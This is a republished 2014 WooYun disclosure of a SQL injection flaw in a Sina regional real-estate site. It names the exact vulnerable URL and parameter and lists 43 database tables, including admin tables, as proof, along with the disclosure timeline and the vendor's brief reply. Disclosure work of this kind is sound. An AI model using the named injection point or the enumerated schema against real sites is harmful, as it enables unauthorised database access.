[公开漏洞]新浪分站某业务SQL注入

来源:WooYun 浏览:704次 时间:2014-06-20
做网站找雨过天晴工作室
新浪分站某业务SQL注入 相关厂商: 新浪 漏洞作者:luwikes 提交时间:2014-05-05 23:40 公开时间:2014-06-19 23:41 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:15 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: php+字符类型注射 Mysql 漏洞详情 披露状态:

2014-05-05:细节已通知厂商并且等待厂商处理中
2014-05-06:厂商已经确认,细节仅向厂商公开
2014-05-16:细节向核心白帽子及相关领域专家公开
2014-05-26:细节向普通白帽子公开
2014-06-05:细节向实习白帽子公开
2014-06-19:细节向公众公开

简要描述:

学习学习~

详细说明:

url:http://city2010.house.sina.com.cn/myphoto.php?uid=1731978885&type_ext=1&ctype=1

参数ctype

000.jpg



001.jpg

漏洞证明:

Database: city2010_house_sina_com_cn

[43 tables]

+------------------------+

| 52shanghai_admin_group |

| 52shanghai_admin_staff |

| 52shanghai_gallery |

| 52shanghai_logpage |

| 52shanghai_photo |

| 52shanghai_rank_log |

| 52shanghai_rank |

| 52shanghai_recommend |

| 52shanghai_user |

| citylife_admin_group |

| citylife_admin_staff |

| citylife_collect |

| citylife_comments |

| citylife_developer |

| citylife_fans |

| citylife_gallery |

| citylife_logdb |

| citylife_logpage |

| citylife_mms |

| citylife_photo |

| citylife_rank |

| citylife_rank_log |

| citylife_recommend |

| citylife_tag |

| citylife_user |

| green_admin_group |

| green_admin_staff |

| green_gallery |

| green_logpage |

| green_photo |

| green_rank |

| green_rank_log |

| green_recommend |

| green_user |

| review_authors |

| review_galleries |

| review_grades |

| review_photos |

| review_projects |

| review_roles |

| review_roles_users |

| review_users |

| review_users_projects |

+------------------------+

修复方案:

版权声明:转载请注明来源 luwikes@乌云 漏洞回应 厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-05-06 15:00

厂商回复:

感谢关注新浪安全,地方站点问题较多,

最新状态:

暂无